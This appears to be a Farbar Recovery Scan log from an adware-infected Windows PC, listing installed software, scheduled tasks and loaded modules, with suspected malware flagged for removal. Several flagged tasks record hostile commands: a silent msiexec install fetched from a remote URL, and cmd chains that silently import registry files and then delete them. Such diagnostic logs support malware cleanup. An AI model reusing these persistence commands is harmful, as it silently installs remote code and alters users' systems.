        Alcor Micro USB Card Reader Driver (HKLM-x32...\InstallShield_{9D569A6E-C9DF-490E-93E0-7AFD28D1F9BB}) (Version: 20.23.401.14519 - Alcor Micro Corp.)
        Alcor Micro USB Card Reader Driver (x32 Version: 20.23.401.14519 - Alcor Micro Corp.) Hidden
        Ansel (Version: 378.92 - NVIDIA Corporation) Hidden
        ArcSoft WebCam Companion 3 (HKLM-x32...{34985F59-8F6F-46F4-9AD5-53E2714294D2}) (Version: 3.0.189 - ArcSoft)
        ASUS PTP Driver (HKLM-x32...{7618E419-9124-4E6C-9AF4-487A6DDEC1C5}) (Version: 11.0.11 - ASUS)
        ASUS Touchpad Handwriting (HKLM-x32...{F3ED910A-9041-49D0-9C70-BD9E1DC5B08E}) (Version: 1.0.2 - ASUS)
        ATK Package (HKLM-x32...{AB5C933E-5C7D-4D30-B314-9C83A49B94BE}) (Version: 1.0.0043 - ASUS)
        AudioWizard (HKLM-x32...{57E770A2-2BAF-4CAA-BAA3-BD896E2254D3}) (Version: 1.0.0.157 - ICEpower a/s)
        AVG (Version: 16.151.8012 - AVG Technologies) Hidden
        AVG 2016 (Version: 16.0.4769 - AVG Technologies) Hidden
        AVG Protection (HKLM...\AVG) (Version: 2016.151.8012 - AVG Technologies)
        Bandicam (HKLM-x32...\Bandicam) (Version: 3.3.3.1209 - Bandicam.com)
        Bandicam MPEG-1 Decoder (HKLM-x32...\BandiMPEG1) (Version: - Bandicam.com)
        BattlePing (HKLM-x32...{DB480AC3-1578-B8DC-3F8F-786A2A4E3BC7}) (Version: 1.3.8.6 - BattlePing)
        CCleaner (HKLM...\CCleaner) (Version: 5.27 - Piriform)
        Conexant HD Audio (HKLM...\CNXT_AUDIO_HDA) (Version: 8.66.34.55 - Conexant)
        Dropbox (HKLM-x32...\Dropbox) (Version: 22.4.24 - Dropbox, Inc.)
        Dropbox Update Helper (x32 Version: 1.3.65.1 - Dropbox, Inc.) Hidden
        FMW 1 (Version: 1.143.3 - AVG Technologies) Hidden
        Google Chrome (HKLM-x32...\Google Chrome) (Version: 57.0.2987.133 - Google Inc.)
        Google Chrome (HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
        Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
        Hotspot Shield 6.5.2 (HKLM-x32...{f411f6f6-30e8-4177-81b7-455433e8c372}) (Version: 6.5.2.10372 - AnchorFree Inc.)
        Hotspot Shield 6.5.2 (x32 Version: 6.5.2 - AnchorFree Inc.) Hidden
        Hotspot Shield 6.5.2 (x32 Version: 6.5.2.10372 - AnchorFree Inc.) Hidden
        HxD Hex Editor version 1.7.7.0 (HKLM-x32...\HxD Hex Editor_is1) (Version: 1.7.7.0 - Maël Hörz)
        Intel(R) Chipset Device Software (x32 Version: 10.1.1.32 - Intel(R) Corporation) Hidden
        Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32...{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.2.10900.330 - Intel Corporation)
        Intel(R) Management Engine Components (HKLM...{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.5.0.1015 - Intel Corporation)
        Intel(R) Processor Graphics (HKLM-x32...{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 21.20.16.4550 - Intel Corporation)
        Intel(R) Serial IO (HKLM...{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.63.1620.3 - Intel Corporation)
        Intel® Security Assist (HKLM-x32...{8B08DDA1-FDE7-4897-8EB6-E0B048A6D88B}) (Version: 1.0.1.618 - Intel Corporation)
        K-Lite Mega Codec Pack 12.8.0 (HKLM-x32...\KLiteCodecPack_is1) (Version: 12.8.0 - KLCP)
        Microsoft Office Professional Plus 2016 - en-us (HKLM...\ProplusRetail - en-us) (Version: 16.0.6769.2040 - Microsoft Corporation)
        Microsoft Project Professional 2016 - en-us (HKLM...\ProjectProRetail - en-us) (Version: 16.0.6769.2040 - Microsoft Corporation)
        Microsoft Visio Professional 2016 - en-us (HKLM...\VisioProRetail - en-us) (Version: 16.0.6769.2040 - Microsoft Corporation)
        Microsoft Visual C++ 2005 Redistributable (HKLM-x32...{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
        Microsoft Visual C++ 2005 Redistributable (x64) (HKLM...{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
        Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM...{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
        Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32...{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
        Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM...{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
        Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32...{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
        Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32...{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
        Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32...{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
        Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23506 (HKLM-x32...{3ee5e5bb-b7cc-4556-8861-a00a82977d6c}) (Version: 14.0.23506.0 - Microsoft Corporation)
        Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32...{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
        Mozilla Firefox 49.0 (x86 en-US) (HKLM-x32...\Mozilla Firefox 49.0 (x86 en-US)) (Version: 49.0 - Mozilla)
        NVIDIA GeForce Experience 3.4.0.70 (HKLM...{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.4.0.70 - NVIDIA Corporation)
        NVIDIA Graphics Driver 378.92 (HKLM...{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 378.92 - NVIDIA Corporation)
        NVIDIA PhysX System Software 9.16.0318 (HKLM...{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
        NvNodejs (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
        NvTelemetry (Version: 2.3.16.0 - NVIDIA Corporation) Hidden
        NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
        Office 16 Click-to-Run Extensibility Component (Version: 16.0.6729.1019 - Microsoft Corporation) Hidden
        Office 16 Click-to-Run Licensing Component (Version: 16.0.6729.1019 - Microsoft Corporation) Hidden
        Office 16 Click-to-Run Localization Component (Version: 16.0.6729.1019 - Microsoft Corporation) Hidden
        PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
        Qualcomm Atheros Bluetooth Suite (64) (HKLM...{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 10.0.1.7 - Qualcomm Atheros)
        Qualcomm Atheros Client Installation Program (HKLM-x32...{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
        Ragnarok Online (HKLM-x32...{181579B5-0028-4E01-AC27-97ED80352279}) (Version: 15.2.2 - Gravity Interactive, Inc.)
        Razer Cortex (HKLM-x32...\Razer Cortex_is1) (Version: 7.6.8.66 - Razer Inc.)
        Razer Synapse (HKLM-x32...{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 2.20.17.116 - Razer Inc.)
        Realtek Ethernet Controller Driver (HKLM-x32...{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.9.422.2016 - Realtek)
        SHIELD Streaming (Version: 7.1.0351 - NVIDIA Corporation) Hidden
        SHIELD Wireless Controller Driver (Version: 3.4.0.70 - NVIDIA Corporation) Hidden
        Skype™ 7.32 (HKLM-x32...{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.32.104 - Skype Technologies S.A.)
        Social2Search (HKLM...\0aa2d831c87854a3a60bfe212a041afb) (Version: 11.12.1.334 (i1.0) - Social2Search) <==== ATTENTION
        Speccy (HKLM...\Speccy) (Version: 1.30 - Piriform)
        Spotify (HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Spotify) (Version: 1.0.51.693.g6ea1e7f6 - Spotify AB)
        TeamSpeak 3 Client (HKLM...\TeamSpeak 3 Client) (Version: 3.1.1 - TeamSpeak Systems GmbH)
        Update_msi (HKLM-x32...{59B5A9CD-253D-4C41-A073-B387D4C9672D}) (Version: 1.0.0 - Default Company Name)
        Vegas Pro 13.0 (64-bit) (HKLM-x32...\Vegas Pro 13.0 (64-bit)) (Version: 13.0 (64-bit) - Exµs ™)
        Visual Studio 2012 x64 Redistributables (HKLM...{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
        Visual Studio 2012 x86 Redistributables (HKLM-x32...{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
        Vulkan Run Time Libraries 1.0.39.1 (HKLM...\VulkanRT1.0.39.1) (Version: 1.0.39.1 - LunarG, Inc.)
        Winamp (HKLM-x32...\Winamp) (Version: 5.64 - Nullsoft, Inc)
        Winamp Detector Plug-in (HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Winamp Detect) (Version: 1.0.0.1 - Nullsoft, Inc)
        Windows Driver Package - ASUS (AsusPTPDrv) HIDClass (06/03/2016 11.0.0.11) (HKLM...\0B4533347E894EFA3F8DC5D4B35CF2D1B1BF756F) (Version: 06/03/2016 11.0.0.11 - ASUS)
        WinFlash (HKLM-x32...{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 3.2.1 - ASUS)
        WinRAR 5.20 (64-bit) (HKLM...\WinRAR archiver) (Version: 5.20.0 - win.rar GmbH)
        Zemana AntiMalware (HKLM-x32...{8F0CD7D1-42F3-4195-95CD-833578D45057}_is1) (Version: 2.72.0.176 - Zemana Ltd.)

        ==================== Custom CLSID (Whitelisted): ==========================

        (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\ChromeHTML: → “C:\Program Files (x86)\Standuck\Application\chrome.exe” “%1” <==== ATTENTION

        ==================== Scheduled Tasks (Whitelisted) =============

        (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

        Task: {055BE636-8A75-48CB-94E8-541F0E8BCDAD} - System32\Tasks\Thoveent Engine => C:\Program Files (x86)\Coefutain\chunoty.exe [2017-02-15] (Glarysoft Ltd)
        Task: {0770C7B6-F3AE-4F53-B71D-A76BFFBB8B7A} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-24] (NVIDIA Corporation)
        Task: {1119F5F5-230C-49E2-B585-E9C7DC86FFA8} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-02-24] (NVIDIA Corporation)
        Task: {119A79FD-0C1C-47B4-B524-7B66629B469B} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-24] (NVIDIA Corporation)
        Task: {1FA4399D-9FF2-4BF4-9530-FD37BA6501D1} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-02-24] (NVIDIA Corporation)
        Task: {247BA270-EDA1-46DC-BAA9-39E4770C3E75} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-02-24] (NVIDIA Corporation)
        Task: {3D4F6FD6-2BB8-4E02-9835-48E03932218F} - System32\Tasks\snp => C:\ProgramData\Zaamla\Zaamla.exe <==== ATTENTION
        Task: {46277740-9FC6-4103-926B-67E95F4BDB70} - System32\Tasks\Kinyatiqther => “msiexec” /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=HGSTXHTS541010A9E680_JD1008DM20840W20840 WX&v=2017215 /q <==== ATTENTION
        Task: {4BC6F16B-425A-490B-B31A-C0052212C97F} - System32\Tasks\snf => C:\ProgramData\Zaamla\Zaamla.exe <==== ATTENTION
        Task: {4DDCF674-96F1-4D82-88C7-BE9E3C3668BA} - System32\Tasks\psv_Opedomtax => cmd.exe /c regedit.exe /s “C:\ProgramData\Zaamla\Flexflex.reg” & del “C:\ProgramData\Zaamla\Flexflex.reg” & SCHTASKS /Delete /TN “psv_Opedomtax” /F <==== ATTENTION
        Task: {56A274A8-FE36-4157-8DD3-8485BDDAA11E} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-02-08] (Piriform Ltd)
        Task: {56B7C5D5-6007-49F1-9A7E-25CBC44363AC} - System32\Tasks\KMS8 => C:\Windows\KMS8\KMS8.exe
        Task: {5DE64C7E-1EC2-4F6F-9932-FEB4AD204749} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-02-24] (NVIDIA Corporation)
        Task: {680E7481-CE2A-46F2-BE02-A93AE3AE199B} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe
        Task: {87BF1A6A-8D4B-4CFD-AAB7-9F1E3BEB9371} - System32\Tasks\ASUS USB Charger Plus => C:\Program Files (x86)\ASUS\USBChargerPlus\USBChargerPlus.exe
        Task: {8BB2290E-94D7-4ED6-B018-BE9975987ADB} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-02-18] (Dropbox, Inc.)
        Task: {8FA86C41-F674-466C-B102-C41673D92761} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-04-24] (Microsoft Corporation)
        Task: {92B98D34-5A01-480F-A2D9-EA2D69759E6F} - System32\Tasks\psv_SumCore => cmd.exe /c regedit.exe /s “C:\ProgramData\Zaamla\Opeplus.reg” & del “C:\ProgramData\Zaamla\Opeplus.reg” & SCHTASKS /Delete /TN “psv_SumCore” /F <==== ATTENTION
        Task: {99AC7774-A7D4-48EB-B1A4-DC2622F0AB58} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-04-24] (Microsoft Corporation)
        Task: {9B4FA76B-062E-4A76-AED8-AB7C9EB7CACC} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-01-13] ()
        Task: {A325DA10-9C1F-43F4-BE04-697633F99F34} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-31] (Google Inc.)
        Task: {A3522BEA-4747-4958-AE6D-785C40D3A9C1} - System32\Tasks\hostTask => C:\ProgramData\PrefsSecure\tree.exe <==== ATTENTION
        Task: {A7F65295-0372-4839-B196-1096F277EE08} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-02-18] (Dropbox, Inc.)
        Task: {AD0E0F2C-6881-4714-A7DF-58956934C44F} - System32\Tasks\ASUS Touchpad Handwriting (x64) => C:\Program Files (x86)\ASUS\ASUS Touchpad Handwriting\Exe\x64\AsusHWLaunch64.exe [2016-06-20] (ASUSTeK Computer Inc.)
        Task: {C2A4DE53-B0EB-42AE-8991-E8E8E3BF10EB} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-31] (Google Inc.)
        Task: {CED1D1E4-8EF4-4635-940D-F63260CFFCC6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAge ntLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2017-02-14] (Microsoft Corporation)
        Task: {D099FB37-05F5-49E3-9380-9D5DADC2EC01} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-02-20] (Intel(R) Corporation)
        Task: {D0C1965C-9F36-4383-8CE3-18395AF228A5} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-02-24] (NVIDIA Corporation)
        Task: {D105CB65-FB62-4DEF-8CA1-1AFBD26C4358} - System32\Tasks\Microsoft\Office\OfficeTelemetryAge ntFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2017-02-14] (Microsoft Corporation)
        Task: {E5F58150-8FA5-4E78-A7A5-434914E968B6} - System32\Tasks\WinTOOL => C:\ProgramData\wintools\WintoolUprI.exe
        Task: {E7C10FD8-66F3-4D6B-A1FA-8D9C9CB940C7} - System32\Tasks\KMS8Server => C:\Windows\KMS8\KMS8.exe
        Task: {EED4372D-D54A-41FF-80BF-9C2D73D1BE12} - System32\Tasks\psv_TrisAir => cmd.exe /c regedit.exe /s “C:\ProgramData\Zaamla\Flexransing.reg” & del “C:\ProgramData\Zaamla\Flexransing.reg” & SCHTASKS /Delete /TN “psv_TrisAir” /F <==== ATTENTION

        (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

        Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
        Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe

        ==================== Shortcuts =============================

        (The entries could be listed to be restored or removed.)

        ==================== Loaded Modules (Whitelisted) ==============

        2016-07-16 18:42 - 2016-07-16 18:42 - 00231424 _____ () C:\Windows\SYSTEM32\ism32k.dll
        2017-03-15 09:39 - 2017-03-04 14:19 - 02681200 _____ () C:\Windows\system32\CoreUIComponents.dll
        2017-02-14 15:04 - 2017-03-17 06:16 - 00133056 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
        2017-02-14 16:28 - 2016-04-24 14:24 - 00172224 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
        2017-02-18 17:46 - 2017-02-24 01:35 - 04489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
        2017-02-18 17:46 - 2017-02-24 01:35 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
        2017-03-15 09:39 - 2017-03-04 14:19 - 02681200 _____ () C:\Windows\SYSTEM32\CoreUIComponents.dll
        2017-03-22 07:07 - 2017-03-22 07:07 - 00154480 _____ () D:\Program Files (x86)\Zemana AntiMalware\ZAMShellExt64.dll
        2016-08-15 14:21 - 2016-08-15 14:21 - 00959168 _____ () C:\Users\ASUS\AppData\Local\Microsoft\OneDrive\17. 3.6381.0405\amd64\ClientTelemetry.dll
        2017-02-16 11:22 - 2016-09-07 11:56 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.Share dUtilities.dll
        2017-03-15 09:38 - 2017-03-04 13:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
        2017-02-14 14:32 - 2017-02-14 14:32 - 01786944 _____ () D:\Program Files (x86)\BattlePing\bp\networkdllx64.dll
        2017-02-17 11:38 - 2017-02-17 11:39 - 13095002 _____ () D:\Bots\openkore-master\wxstart.exe
        2017-03-24 23:49 - 2017-02-17 11:39 - 13095002 _____ () D:\Bots\Vend Oridecon\wxstart.exe
        2017-03-15 09:39 - 2017-03-04 13:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw 5n1h2txyewy\CortanaApi.dll
        2017-03-15 09:39 - 2017-03-04 13:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw 5n1h2txyewy\Cortana.Core.dll
        2017-03-15 09:39 - 2017-03-04 13:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw 5n1h2txyewy\CSGSuggestLib.dll
        2017-03-15 09:40 - 2017-03-04 13:05 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw 5n1h2txyewy\Cortana.Actions.dll
        2017-03-15 09:39 - 2017-03-04 13:05 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw 5n1h2txyewy\Cortana.BackgroundTask.dll
        2017-03-15 09:40 - 2017-03-04 13:08 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw 5n1h2txyewy\RemindersUI.dll
        2017-03-01 13:55 - 2017-03-01 13:55 - 01420864 _____ () D:\Program Files (x86)\BattlePing\bp\networktunnelx64helper.exe
        2017-02-18 23:28 - 2017-03-23 09:22 - 07820208 _____ () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragexe.exe
        2017-02-14 14:32 - 2017-02-14 14:32 - 00209984 _____ () D:\Program Files (x86)\BattlePing\bp\networkdllx64_l.dll
        2017-03-14 09:10 - 2017-03-14 09:10 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x 64__kzf8qxf38zg5c\SkypeHost.exe
        2017-03-14 09:10 - 2017-03-14 09:10 - 00182784 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x 64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
        2017-03-14 09:10 - 2017-03-14 09:10 - 41048064 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x 64__kzf8qxf38zg5c\SkyWrap.dll
        2017-03-14 09:10 - 2017-03-14 09:10 - 02236896 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x 64__kzf8qxf38zg5c\roottools.dll
        2017-04-01 00:05 - 2017-03-29 15:47 - 02885464 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libg lesv2.dll
        2017-04-01 00:05 - 2017-03-29 15:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libe gl.dll
        2017-02-18 17:47 - 2017-02-24 01:35 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
        2017-02-18 17:46 - 2017-02-24 01:35 - 03774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
        2017-02-18 17:46 - 2017-02-24 01:35 - 00900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
        2017-02-18 09:33 - 2017-02-18 09:33 - 48920064 _____ () C:\Program Files (x86)\AVG\UiDll\2623\libcef.dll
        2016-05-17 11:50 - 2016-05-17 11:50 - 01243936 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
        2017-02-18 17:47 - 2017-02-23 21:30 - 00338488 _____ () \?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
        2017-02-18 17:47 - 2017-02-23 21:30 - 00252352 _____ () \?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
        2017-02-18 17:47 - 2017-02-23 21:30 - 02443320 _____ () \?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
        2017-02-18 17:47 - 2017-02-23 21:30 - 00385592 _____ () \?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
        2017-02-18 17:47 - 2017-02-23 21:30 - 00543288 _____ () \?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
        2017-02-18 17:47 - 2017-02-23 21:30 - 00468536 _____ () \?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
        2017-03-31 16:22 - 2017-03-31 16:22 - 00020587 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\5811ad0143ef4b833721b86079129a8b\Cwd.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00045163 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\791de6785dee4272f81191509a3916a3\Win32.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024693 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\547b44fb47bb4104d54fb0610521d69a\HiRes.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00028794 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\f7d2b8d992c83a5fef49816625c82c17\Util.dll
        2017-02-17 11:38 - 2017-02-16 20:05 - 00842999 ____N () D:\Bots\openkore-master\XSTools.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00036974 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\c89c5c2b62d65b506e25181740473cfb\Encode.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024670 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\39e77646f120ab10fd580ce5547457bc\IO.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024679 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\f6abdadf80d1a5df1c193b3555a992e5\Glob.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00102530 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\87b0c32a91693f393d3e4a7ae21581b5\Zlib.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024676 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\976149dce8abb473f6370400bbeeb653\Fcntl.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00028785 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\b3334b0da6e9ac8826a7bcb95b759392\encoding.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00028774 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\cd1f373da56ce7952df1037c9f6ec08e\Socket.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00168030 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\4b5d489aed73c7799d111b1ef29e78d3\re.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00032888 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\a556e1815f2ed7e75af25a4aa09bc7c0\Dumper.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024691 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\a416e864dcdf5f06c5e5c3808475f131\MD5.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00024716 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\dbecb32fee611cea5ae0f8234b695952\FastCalc.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00065642 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\1d18acbf4e8b63dcd4166d6bcf1b5dcb\Storable.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00020592 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\100d58df9126891749a3fb0f45c68549\Name.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00020596 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\ddc012f560581dc3fe7348684b23e5f2\File.dll
        2017-03-21 18:30 - 2017-03-21 18:29 - 00007182 ____N () C:\Users\ASUS\AppData\Local\Temp\wxppl-ASUS\3868281d4f267e7194ec65b2ff72b28f\mingwm10.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00020590 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\5f6dcecdb4ceef3ce50f5ca4a3eb1a7c\attributes.d ll
        2017-03-31 16:22 - 2017-03-31 16:22 - 02910208 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\37d8a3ea6513473b8612cef176c99de2\Wx.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00162304 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\a3c79762244d92195f0c441ad398c938\Print.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00594944 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\b05495b4bd6578cc1295c96b7efd9c43\RichText.dll
        2017-03-31 16:22 - 2017-03-31 16:22 - 00049277 ____R () C:\Users\ASUS\AppData\Local\Temp\pdk-ASUS-7716\048dac34a71ef7231b3a939779ee0544\Console.dll
